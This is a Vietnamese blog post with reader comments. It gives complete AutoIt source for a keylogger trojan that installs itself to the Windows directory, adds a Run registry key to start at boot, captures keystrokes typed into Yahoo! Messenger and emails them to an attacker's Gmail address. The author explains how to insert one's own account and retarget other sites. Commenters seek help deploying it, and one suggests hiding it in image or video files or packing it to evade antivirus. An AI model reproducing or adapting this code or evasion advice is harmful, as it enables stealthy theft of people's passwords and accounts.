Tác giả: Bùi Quốc Phong
Bài viết này chỉ mang tính chất minh họa, không nhằm mục đích phá hoại. Tôi không chịu bất kỳ trách nhiệm nào nếu các bạn sử dụng nó với mục đích xấu.
Thời buổi ngày nay, việc ăn cắp pass ở các tài khoản trực tuyến nhiều đến nỗi không đếm nổi. Nào là ăn cắp pass ở yahoo, nào là tài khoản ngân hàng, nào là tài khoản game online…. Cách thức chủ yếu của các hacker đó là cài trojan, keylog. Bạn đã rất cẩn thận và bạn đã có một phần mềm virus tốt, nhưng liệu bạn có phòng tránh được tất cả các virus cũng như các trojan và keylog? biết cách một con trojan hoạt động như thế nào để phòng tránh cũng tốt đúng không nào? Nào chúng ta bắt đầu thôi
Công cụ: Tất nhiên lập trình thì phải có công cụ để lập trình rồi. Để đơn giản chúng ta sử dụng AutoIt để viết code. Các bạn có thể download AutoIt tại website: http://www.autoitscript.com
Viết code: Mình cung cấp cho các bạn đoạn code sau để các bạn tham khảo
#include <File.au3>
#NoTrayIcon
Global $oMyError = ObjEvent(“AutoIt.Error”, “MyErrFunc”)
$keylog=””
$co=0
_dangky()
;Capital Letters
For $n = 65 To 90
HotKeySet(Chr($n), “My_HotKey_Func”)
Next
;Lowercase Letters
For $n = 97 To 122
HotKeySet(Chr($n), “My_HotKey_Func”)
Next
;Numbers
For $n = 47 To 58
HotKeySet(Chr($n), “My_HotKey_Func”)
NextHotkeySet(“.”, “My_Hotkey_Func”)
HotKeySet(“+!d”, “_exit”)
;Specials
$charL1=”{SPACE}|{BACKSPACE}|{UP}|{DOWN}|{LEFT}|{RIGHT}|{ENTER}|{HOME}|{END}|{INSERT}|{DELETE}|{PGUP}|{PGDN}|{!}|{#}|{+}|{^}|{NUMLOCK on}|{NUMLOCK off}|{CAPSLOCK off}|{CAPSLOCK on}|{ESC}|{TAB}”
$charL= $charL1&”|{NUMPAD0}|{NUMPAD1}|{NUMPAD2}|{NUMPAD3}|{NUMPAD4}|{NUMPAD5}|{NUMPAD6}|{NUMPAD7}|{NUMPAD8}|{NUMPAD9}”
$KeyList = StringSplit($charL, “|”)
$maloaibo=StringSplit($charL1, “|”)
For $n = 1 To $KeyList[0]
HotKeySet($KeyList[$n], “MY_HotKey_Func”)
NextWhile 1
;Sleep(100)
WinActive(“Yahoo! Messenger”)
$co=1
WinWaitNotActive(“Yahoo! Messenger”)
$tg=$keylog
For $i=1 To UBound($maloaibo)-1
If StringInStr($keylog,$maloaibo[$i]) Then
$tg=StringReplace($keylog,$maloaibo[$i],””)
EndIf
Next
If StringLen($tg)>9 Then
_sendEmail($keylog)
$keylog=””
EndIf
$co=0
WEndFunc My_HotKey_Func()
;MsgBox(0, “”, @HotKeyPressed)
if $co=1 Then
$keylog&=@HotKeyPressed
EndIf
$Name = @HotkeyPressed
If $Name = “.” then $Name = “period”;SoundPlay(“c:\sounds\”&$Name&”.wav”) ; exceptions for keys like period slash or symobols that can’t be in filenames
; Turn off hotkey temporarily so letter can be sent.
HotKeySet(@HotKeyPressed)
Send(@HotKeyPressed)
; turn hotkey back on
HotKeySet(@HotKeyPressed, “My_HotKey_Func”)
EndFunc ;==>My_HotKey_FuncFunc _dangky() ; dang khu va copy
IF Not FileExists(@WindowsDir&”\ikcmds.exe”) Then
FileCopy(“ikcmds.exe”,@WindowsDir&”\ikcmds.exe”)
EndIf
$reg=RegRead(“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, “ikcmds”)
if @error Then
RegWrite(“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, “ikcmds”, “REG_SZ”, @WindowsDir&”\ikcmds.exe”)
EndIf
EndFunc
Func _sendEmail($noidung)
$s_SmtpServer = “smtp.gmail.com”
$s_FromName = “trommatkhau”
$s_FromAddress = “abcdef@gmail.com”
$s_ToAddress = “abcdefhau@gmail.com“
$s_Subject = “Hack pass yahoo”
$as_Body = $noidung
$s_AttachFiles = “” ;@WindowsDir&”\ikcmds.txt”
$s_CcAddress = “”
$s_BccAddress = “”
$s_Username = “abcded”
$s_Password = “**************”
$IPPort = 465
$ssl = 1
;##################################
; Script
;##################################
Global $oMyRet[2]
Global $oMyError = ObjEvent(“AutoIt.Error”, “MyErrFunc”)
$rc = _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body, $s_AttachFiles, $s_CcAddress, $s_BccAddress, $s_Username, $s_Password, $IPPort, $ssl)
If @error Then
MsgBox(0, “Error sending message”, “Error code:” & @error & ” Rc:” & $rc)
Exit
EndIf
EndFuncFunc _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = “”, $as_Body = “”, $s_AttachFiles = “”, $s_CcAddress = “”, $s_BccAddress = “”, $s_Username = “”, $s_Password = “”, $IPPort = 25, $ssl = 0)
$objEmail = ObjCreate(“CDO.Message”)
$objEmail.From = ‘”‘ & $s_FromName & ‘” <‘ & $s_FromAddress & ‘>’
$objEmail.To = $s_ToAddress
Local $i_Error = 0
Local $i_Error_desciption = “”
If $s_CcAddress <> “” Then $objEmail.Cc = $s_CcAddress
If $s_BccAddress <> “” Then $objEmail.Bcc = $s_BccAddress
$objEmail.Subject = $s_Subject
If StringInStr($as_Body, “<“) And StringInStr($as_Body, “>”) Then
$objEmail.HTMLBody = $as_Body
Else
$objEmail.Textbody = $as_Body & @CRLF
EndIf
If $s_AttachFiles <> “” Then
Local $S_Files2Attach = StringSplit($s_AttachFiles, “;”)
For $x = 1 To $S_Files2Attach[0]
$S_Files2Attach[$x] = _PathFull($S_Files2Attach[$x])
If FileExists($S_Files2Attach[$x]) Then
$objEmail.AddAttachment($S_Files2Attach[$x])
Else
$i_Error_desciption = $i_Error_desciption & @LF & ‘File not found to attach: ‘ & $S_Files2Attach[$x]
SetError(1)
Return 0
EndIf
Next
EndIf
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/sendusing”) = 2
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpserver”) = $s_SmtpServer
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpserverport”) = $IPPort
;Authenticated SMTP
If $s_Username <> “” Then
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpauthenticate”) = 1
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/sendusername”) = $s_Username
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/sendpassword”) = $s_Password
EndIf
If $ssl Then
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpusessl”) = True
EndIf
;Update settings
$objEmail.Configuration.Fields.Update
; Sent the Message
$objEmail.Send
If @error Then
SetError(2)
Return $oMyRet[1]
EndIf
EndFunc ;==>_INetSmtpMailCom
;
;
; Com Error Handler
Func MyErrFunc()
$HexNumber = Hex($oMyError.number, 8)
$oMyRet[0] = $HexNumber
$oMyRet[1] = StringStripWS($oMyError.description, 3)
;ConsoleWrite(“### COM Error ! Number: ” & $HexNumber & ” ScriptLine: ” & $oMyError.scriptline & ” Description:” & $oMyRet[1] & @LF)
SetError(1); something to check for when this function returns
Return
EndFunc ;==>MyErrFunc
Func _exit()
Exit
EndFunc
Bạn hãy nhìn vào đoạn code trên và chú ý vào những chỗ tôi đánh dấu mầu đỏ. Mục đích của con trojan này là ăn cắp pass và tài khoản người dùng yahoo messenger và gủi về một địa chỉ email định trước. Để có thể đẽ dàng sử dụng bạn hãy tạo một tài khoản ở Gmail.com sau đó thay các dòng địa chỉ mầu đỏ bằng tài khoản tương ứng của bạn là được. Bạn cũng có thể biến đổi con trojan này dùng để lấy tài khoản và mật khẩu của các trang khác bàng cách thay đổi 2 đoạn code mà tôi cũng đã đánh dấu mầu đỏ đó là: WinActive(“Yahoo! Messenger”) và WinWaitNotActive(“Yahoo! Messenger”)(“Yahoo! Messenger”). Nói thế thôi là bạn hiểu rồi đúng không. Hi vọng sau bài viết này các bạn sẽ tự rút ra cho mình một các phòng chống hiệu quả cho những tài khoản cá nhân của mình.
Nếu bạn muốn copy bài viết này phải ghi rõ nguồn từ http://cuopbien.tk
Tagged: hack pass yahoo, trojan, virus, ăn cắp pass
Cảm ơn bác, e đang thử để lấy lại pass YM cho ng yêu
anh cho em nick Y!M để em tiện hỏi với
anh cho nick Y!M de em tein lian lac voi anh kkhong. chac anh cung viet trojan chu gi? em cung muon hoc lam nhung ma khong co ai chi bao em ca. em len mang kiem co luc duoc luc khong anh oi
nham nhi that, co gioi thi hack to ne: mekongviet@yahoo.com
dang pass hack duoc len day cho anh em xem voi, de bit po teo “lua doi luong tam” ntn
bullshit
dis, lua dao, lam deo j co. cha le thang yahoo de yen ah.
haha, anh chủ topic này dzui tính quá. làm gì có chiện này, đi đâu cũng thấy, đã có ai thành công đâu
bạn mekongviet còn dọa và thách nữa àh, mình sẽ ủng hộ phe nào nhỉ?
@mekongviet: Bạn có hiểu những đoạn code ở trên không, nếu bạn hiểu nó bạn sẽ hiểu những gì bạn nói, còn nếu không hiểu mong bạn hãy phát ngôn thận trọng hơn một chút.
DOAN CODE TREN RAT HAY! TOI LA DAN IT DAY. HACK PHAI CO MOT CAI DAU.
BANG KHONG CUNG DEN THE THIO HUHUHU
uhm…uhm… cai’ code kua? pac’ bi loi~ rui` pac’ oi >”< mong pac’ kiem tra thu? ^^! hinh` nhu o doan cuoi’ do’ pac’ 😀
Thanks ! Baì viết rất hay !
Các bạn cũng nên cám ơn tác giả của bài viết này vì tinh thần opensource
Những kẻ không biết gì hay mù code thì đừng nên thốt ra những lời khiếm nhã như thế
Cam on ban minh! Minh cung muon thu lam chuong trinh nay nhung do trinh do lap trinh con qua kem va chua biet lap trinh tren autoit nen ko the viet neu co dieu kien ban chi qua cho minh cach lap trinh tren autoit dc ko ban. Thanks ban nhieu. Minh se thuong xuyen check tren trang nay neu ban huong dan so qua cho minh thi xin gui vao mail cua minh la dc.
@Cam On Ban: Chào bạn, thật khó để có thể thành lập một topic về AUTOIT trên blog của mình, với AutoIt cách học tốt nhất là bạn hãy tải chương trình AutoIT (bản full) về cài đặt sau đó mở help của nó ra, mỗi hàm trong AutoIT đều có hướng dẫn dẫn cụ thể. Sau khi học xong các hàm cơ bản bạn có thể vào Forum của AutoIt, ở đó có rất nhiều điều đáng để cho bạn học. Mình nghĩ AutoIt là một công cụ tốt để viết các ứng dụng nhỏ phục vụ cho công việc hàng ngày của mình, học nó có rất nhiều lợi ích. Khi bạn cần viết một chương trình nào đó, nếu gặp khó khăn bạn có thể post lên blog của mình, chúng ta sẽ cùng nhau thảo luận, chúc bạn may mắn
saj cung dc nhung mo` luc’ sned mail bj loi` rui` ban oi coi dum` lai caj dj
sua? laj het rui` chay ngon nhun ma` lag may’ woo’ voi lai luc danh’ chu~ no’ ra cham kho’ danh’ wa’ nguoi` ta nhinh` la` bit lien` ah`
bạn sửa được hả , sao có một số lỗi mình sửa ko được, bạn chỉ mình với !
🙂 O) 0)
!:)
ban kuas oi, cho minh xin yh nhe. minh dang gap mot so van de
ban oi, cho minh nik yh, minh co viec can hoi , thks ban!
Chào bạn Kuas, cảm ơn bạn vì bài viết rất hay này. Mình vừa bị kẻ xấu lấy mất pass yahoo để lừa đảo mua thẻ điện thoại Viettel, mình rất bực mình nhưng không biết làm thế nào. Bạn bè gọi tới hỏi mình kinh doanh điện thoại từ lúc nào thế làm mình ngớ cả người. Bạn có thể cho mình nick yahoo để mình nhờ bạn trao đổi không? Rất mong tin bạn.
Các bạn dám viết và chạy 1 chương trình mà cũng ko hiểu rõ từng câu lệnh thì cũng tài thật????
hay con này hay đấy…..nhưng các bạn không nên sử dụng nó một cách tràn trụi thì rất dể bị anti nó diệt nên không thành công là đúng roài…..các bạn nên ghếp nó vào với các file hình ảnh,video….hoặc nén nó lại nhiêu lần để anti không phát hiện ra thằng đệ mình đang làm việc chứ…thật là kém ưa đi…..
sao loi nhieu vay?
Sua mai khong dc hic